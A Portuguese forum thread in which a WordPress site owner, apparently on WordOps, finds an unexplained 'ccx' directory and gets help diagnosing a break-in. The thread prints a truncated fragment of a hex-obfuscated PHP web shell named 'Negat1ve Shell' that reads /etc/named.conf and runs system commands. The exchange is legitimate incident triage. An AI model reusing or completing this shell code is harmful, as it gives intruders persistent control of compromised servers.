Diretorio ccx no wordops

app.webtoo · Dezembro 5, 2022, 12:36pm

@Gabriel na estrutura do wordops existe este diretorio ccx?

Gabriel · Dezembro 5, 2022, 12:41pm

Não. Esse diretório nunca vi no WordOps.
Acredito que se trata de outra coisa.
O que tem dentro deste diretório?

app.webtoo · Dezembro 5, 2022, 12:44pm

Então acho que foi uma invasão talvez

tem um index.php com esse codigo

<?php $shellName = 'Negat1ve Shell'; $logo = 'https://cdn-icons-png.flaticon.com/512/4392/4392477.png'; $func = ["7068705f756e616d65", "70687076657273696f6e", "676574637764", "6368646972", "707265675f73706c6974", "61727261795$ for ($i = 0; $i < count($func); $i++) { $func[$i] = dehex($func[$i]); } session_start(); $func[50](0); @$func[51](0); @$func[52](); @$func[43]('error_log', null); @$func[43]('log_errors',0); @$func[43]('max_execution_time',0); @$func[43]('output_buffering',0); @$func[43]('display_errors', 0); $func[53]("Asia/Jakarta"); if (isset($_GET['dir'])) { $dir = $_GET['dir']; $func[3]($dir); } else { $dir = $func[2](); } $d0mains = @$func[44]("/etc/named.conf", false); if (!$d0mains) { $dom = "Can't Read /etc/named.conf"; } else { $count = 0; foreach ($d0mains as $d0main) { if (@$func[43]($d0main, "zone")) { $func[32]('#zone "(.*)"#', $d0main, $domains); $func[54](); if ($func[55]($func[56]($domains[1][0])) > 2){ $func[54](); $count++; } } } $dom = "$count Domain"; } $dir = $func[45]("\\", "/", $dir); $scdir = $func[46]("/", $dir); $total = $func[29]($dir); $free = $func[30]($dir); $pers = (int) ($free / $total * 100); $ds = @$func[31]("disable_functions"); $show_ds = (!empty($ds)) ? "$ds" : "All function is accessibl$ $cmd_uname = exe("uname -a"); $uname = $func[49]('php_uname') ? $func[41](@$func[0](), 0, 120) : ($func[55]($cmd_uname) > 0 ? $cmd_uname : '( php_uname$ if (strtolower($func[41](PHP_OS, 0, 3)) == "win") {

Gabriel · Dezembro 5, 2022, 12:45pm

Sim
Essa é uma possibilidade real.
Quais arquivos e pastas estão presentes nos diretórios do Wordpress.

app.webtoo · Dezembro 5, 2022, 12:47pm

aparentemente todos, mas também se repette em alguns subdiretorios essa ccx
definitivamente é uma invasão

Gabriel · Dezembro 5, 2022, 12:50pm

Sim.
Já vi algumas invasões com situações muito semelhantes.
Se puder, lista aqui quais plugins está utilizando atualmente. Quem sabe encontramos o responsável.
Para limpar o site a melhor forma que conheço é essa aqui.

app.webtoo · Dezembro 5, 2022, 12:56pm

Estou uzando estes plugins mas tem coisa na pasta /plugins que desconheço, veja na imagem

grifei os arquivos e diretórios que desconheço

Gabriel · Dezembro 5, 2022, 1:03pm

Certo.
Esses diretórios grifados são típicos em invaões.
E estes plugins estão todos atualizados?
Por exemplo primeiro da lista adrotate tem uma vunerabilidade listada no mês 4 que pode possibilitar exatamente este tipo de invasão.

Gabriel · Dezembro 5, 2022, 1:04pm

O elementor tem uma falha crírtica listada dia 19/07
Segue o link da falha.

Gabriel · Dezembro 5, 2022, 1:07pm

Sobre o Elementor na realidade a maioria são falhas de Addons.
Eu cometi um equivo na busca destas falhas.